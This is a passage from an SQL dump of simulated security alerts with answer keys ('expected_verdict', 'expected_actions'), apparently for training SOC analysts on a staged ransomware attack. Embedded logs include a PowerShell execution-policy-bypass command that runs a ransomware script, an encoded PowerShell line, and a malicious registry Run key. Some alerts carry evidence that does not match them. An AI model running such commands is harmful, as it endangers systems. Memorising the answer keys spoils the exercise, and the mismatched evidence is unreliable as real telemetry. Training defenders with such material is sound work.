HTTPS to external IP.\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.455Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:27:03Z\\\",\\\"event_id\\\":\\\"EXFIL12345\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.50\\\",\\\"destination_port\\\":\\\"443\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"username\\\":\\\"jdoe\\\",\\\"exfil_filename\\\":\\\"confidential_data.zip\\\",\\\"exfil_filehash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"alert\\\",\\\"message\\\":\\\"Data exfiltration attempt detected over HTTPS to external IP.\\\"}\"}],\"query\":\"index=main 
source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1547, 'Suspicious Exchange Server Access Detected', 'high', 'Exchange Server Logs', 'The Play APT group begins their attack by exploiting known vulnerabilities in the Exchange server, aiming to establish a foothold within the network. Anomalous login attempt detected from an external IP associated with known malicious activity.', 'Initial Access', 'T1190', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T03:45:27Z\",\"event_id\":\"4625\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.25\",\"username\":\"admin\",\"status\":\"failed\",\"error_code\":\"0xC000006A\",\"logon_type\":3,\"user_agent\":\"Mozilla/5.0\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"file_name\":\"exploit_tool.exe\"}', '2026-03-15 19:12:22', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous APT campaigns targeting Exchange servers.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Internal Exchange server.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Platform\",\"verdict\":\"malicious\",\"details\":\"Hash related to known exploit tool used by Play APT.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"internal\",\"details\":\"Privileged account used for administrative purposes.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.457Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T03:45:27Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"admin\\\",\\\"status\\\":\\\"failed\\\",\\\"error_code\\\":\\\"0xC000006A\\\",\\\"logon_type\\\":3,\\\"user_agent\\\":\\\"Mozilla/5.0\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"file_name\\\":\\\"exploit_tool.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.457Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T03:45:27Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"admin\\\",\\\"status\\\":\\\"failed\\\",\\\"error_code\\\":\\\"0xC000006A\\\",\\\"logon_type\\\":3,\\\"user_agent\\\":\\\"Mozilla/5.0\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"file_name\\\":\\\"exploit_tool.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.457Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T03:45:27Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"admin\\\",\\\"status\\\":\\\"failed\\\",\\\"error_code\\\":\\\"0xC000006A\\\",\\\"logon_type\\\":3,\\\"user_agent\\\":\\\"Mozilla/5.0\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"file_name\\\":\\\"exploit_tool.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.457Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T03:45:27Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"admin\\\",\\\"status\\\":\\\"failed\\\",\\\"error_code\\\":\\\"0xC000006A\\\",\\\"logon_type\\\":3,\\\"user_agent\\\":\\\"Mozilla/5.0\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"file_name\\\":\\\"exploit_tool.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.457Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T03:45:27Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"admin\\\",\\\"status\\\":\\\"failed\\\",\\\"error_code\\\":\\\"0xC000006A\\\",\\\"logon_type\\\":3,\\\"user_agent\\\":\\\"Mozilla/5.0\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"file_name\\\":\\\"exploit_tool.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1548, 'Malicious Script Execution on Compromised Server', 'high', 'Endpoint Detection and Response (EDR)', 'An attacker executed a script on the compromised server to deploy ransomware payloads, initiating the encryption process on critical systems. Immediate attention is required to prevent data loss.', 'Execution', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:10Z\",\"event_id\":\"EDR123456\",\"host\":{\"hostname\":\"compromised-server\",\"ip\":\"192.168.1.45\"},\"user\":\"admin_user\",\"process\":{\"pid\":6789,\"name\":\"powershell.exe\",\"path\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\temp\\\\ransom_script.ps1\"},\"network\":{\"src_ip\":\"192.168.1.45\",\"dst_ip\":\"203.0.113.10\",\"protocol\":\"TCP\",\"dst_port\":\"443\"},\"file\":{\"path\":\"C:\\\\temp\\\\ransom_script.ps1\",\"hash\":\"e99a18c428cb38d5f260853678922e03\"},\"alert\":{\"type\":\"Malicious Script Execution\",\"level\":\"critical\",\"description\":\"Suspicious script execution detected, potentially used for ransomware deployment.\"}}', '2026-03-15 19:12:22', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised server.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP address used by threat actors.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with ransomware 
script.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"ransom_script.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal analysis\",\"verdict\":\"malicious\",\"details\":\"Filename of the ransomware script.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1549, 'Persistence Mechanism Installed', 'medium', 'System Registry Changes', 'Attackers have modified the system registry to establish persistence, ensuring continued access to the compromised network. This change allows them to return even if initial access is detected and blocked.', 'Persistence', 'T1547.001 - Registry Run Keys / Startup Folder', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:22:34Z\",\"hostname\":\"compromised-host\",\"user\":\"malicious_user\",\"internal_ip\":\"192.168.1.100\",\"external_ip\":\"203.0.113.45\",\"registry_key_modified\":\"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\MaliciousApp\",\"registry_value\":\"C:\\\\Malware\\\\maliciousapp.exe\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"action\":\"Registry Key Created\"}', '2026-03-15 19:12:22', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with multiple attacks.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware used for persistence.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"malicious_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"User Monitoring\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.462Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:34Z\\\",\\\"hostname\\\":\\\"compromised-host\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"internal_ip\\\":\\\"192.168.1.100\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"registry_key_modified\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"registry_value\\\":\\\"C:\\\\\\\\Malware\\\\\\\\maliciousapp.exe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"action\\\":\\\"Registry Key Created\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.462Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:34Z\\\",\\\"hostname\\\":\\\"compromised-host\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"internal_ip\\\":\\\"192.168.1.100\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"registry_key_modified\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"registry_value\\\":\\\"C:\\\\\\\\Malware\\\\\\\\maliciousapp.exe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"action\\\":\\\"Registry Key Created\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.462Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:34Z\\\",\\\"hostname\\\":\\\"compromised-host\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"internal_ip\\\":\\\"192.168.1.100\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"registry_key_modified\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"registry_value\\\":\\\"C:\\\\\\\\Malware\\\\\\\\maliciousapp.exe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"action\\\":\\\"Registry Key Created\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.462Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:34Z\\\",\\\"hostname\\\":\\\"compromised-host\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"internal_ip\\\":\\\"192.168.1.100\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"registry_key_modified\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"registry_value\\\":\\\"C:\\\\\\\\Malware\\\\\\\\maliciousapp.exe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"action\\\":\\\"Registry Key Created\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.462Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:34Z\\\",\\\"hostname\\\":\\\"compromised-host\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"internal_ip\\\":\\\"192.168.1.100\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"registry_key_modified\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"registry_value\\\":\\\"C:\\\\\\\\Malware\\\\\\\\maliciousapp.exe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"action\\\":\\\"Registry Key Created\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1550, 'Unusual Lateral Movement Activity', 'high', 'Network Traffic Analysis', 'Detected lateral movement from internal host 192.168.1.45 using compromised credentials to access additional network resources. The attacker is using tools to locate and prepare systems for encryption.', 'Lateral Movement', 'T1021 - Remote Services', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:45Z\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"10.0.0.23\",\"external_attacker_ip\":\"203.0.113.55\",\"protocol\":\"SMB\",\"username\":\"jdoe\",\"filename\":\"ransom_tool.exe\",\"file_hash\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"action\":\"attempted lateral movement\",\"event_id\":\"LM-456789\"}', '2026-03-15 19:12:22', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"Known suspicious IP address associated with prior attacks\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Compromised user account\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"ransom_tool.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"Ransomware tool used in lateral movement\"}},{\"id\":\"artifact_6\",\"type\":\"hash\",\"value\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware 
database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known ransomware\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1551, 'Data Exfiltration Attempts Detected', 'high', 'Data Loss Prevention (DLP) Systems', 'In the final stage of their attack cycle, attackers attempted to exfiltrate sensitive data from the target network. The data was intended to be used as leverage for ransom, threatening its release if demands were not met. The DLP system detected unusual outbound data movement, aligning with known exfiltration techniques.', 'Exfiltration', 'T1020 - Automated Exfiltration', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:31Z\",\"event\":\"data_exfiltration_attempt\",\"source_ip\":\"10.1.1.5\",\"destination_ip\":\"198.51.100.22\",\"filename\":\"confidential_docs.zip\",\"hash\":\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\",\"user\":\"jdoe\",\"protocol\":\"HTTPS\",\"action\":\"blocked\",\"dlp_rule\":\"High_Sensitivity_Data_Exfiltration\"}', '2026-03-15 19:12:22', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.1.1.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.22\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"Known command and control server involved in previous ransomware attacks.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with data exfiltration malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_docs.zip\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_analysis\",\"verdict\":\"suspicious\",\"details\":\"File containing high sensitivity data flagged during exfiltration 
attempt.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_directory\",\"verdict\":\"internal\",\"details\":\"Employee account potentially compromised for data exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.469Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:31Z\\\",\\\"event\\\":\\\"data_exfiltration_attempt\\\",\\\"source_ip\\\":\\\"10.1.1.5\\\",\\\"destination_ip\\\":\\\"198.51.100.22\\\",\\\"filename\\\":\\\"confidential_docs.zip\\\",\\\"hash\\\":\\\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\\\",\\\"user\\\":\\\"jdoe\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"blocked\\\",\\\"dlp_rule\\\":\\\"High_Sensitivity_Data_Exfiltration\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.469Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:31Z\\\",\\\"event\\\":\\\"data_exfiltration_attempt\\\",\\\"source_ip\\\":\\\"10.1.1.5\\\",\\\"destination_ip\\\":\\\"198.51.100.22\\\",\\\"filename\\\":\\\"confidential_docs.zip\\\",\\\"hash\\\":\\\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\\\",\\\"user\\\":\\\"jdoe\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"blocked\\\",\\\"dlp_rule\\\":\\\"High_Sensitivity_Data_Exfiltration\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.469Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:31Z\\\",\\\"event\\\":\\\"data_exfiltration_attempt\\\",\\\"source_ip\\\":\\\"10.1.1.5\\\",\\\"destination_ip\\\":\\\"198.51.100.22\\\",\\\"filename\\\":\\\"confidential_docs.zip\\\",\\\"hash\\\":\\\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\\\",\\\"user\\\":\\\"jdoe\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"blocked\\\",\\\"dlp_rule\\\":\\\"High_Sensitivity_Data_Exfiltration\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.469Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:31Z\\\",\\\"event\\\":\\\"data_exfiltration_attempt\\\",\\\"source_ip\\\":\\\"10.1.1.5\\\",\\\"destination_ip\\\":\\\"198.51.100.22\\\",\\\"filename\\\":\\\"confidential_docs.zip\\\",\\\"hash\\\":\\\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\\\",\\\"user\\\":\\\"jdoe\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"blocked\\\",\\\"dlp_rule\\\":\\\"High_Sensitivity_Data_Exfiltration\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.469Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:31Z\\\",\\\"event\\\":\\\"data_exfiltration_attempt\\\",\\\"source_ip\\\":\\\"10.1.1.5\\\",\\\"destination_ip\\\":\\\"198.51.100.22\\\",\\\"filename\\\":\\\"confidential_docs.zip\\\",\\\"hash\\\":\\\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\\\",\\\"user\\\":\\\"jdoe\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"blocked\\\",\\\"dlp_rule\\\":\\\"High_Sensitivity_Data_Exfiltration\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1552, 'Phishing Email Detected', 'medium', 'Email Gateway Logs', 'A phishing email was detected targeting a school administrator with a malicious attachment aimed at gaining network access.', 'Initial Access', 'T1566.001 - Phishing: Spearphishing Attachment', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T08:45:30Z\",\"email_subject\":\"Urgent: Update Your Account Information\",\"sender_email\":\"support@fakeschool.org\",\"recipient_email\":\"admin@schooldistrict.edu\",\"attachment_name\":\"UpdateAccount.pdf\",\"attachment_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"malicious_url\":\"http://malicious-domain.com/secure\",\"attacker_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.12.55\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36\"}', '2026-03-15 19:12:42', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"support@fakeschool.org\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known phishing email sender\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected as malware\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-domain.com/secure\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan.io\",\"verdict\":\"malicious\",\"details\":\"Phishing site\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"IPVoid\",\"verdict\":\"malicious\",\"details\":\"Associated with phishing campaigns\"}},{\"id\":\"artifact_5\",\"type\":\"ip\",\"value\":\"192.168.12.55\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal 
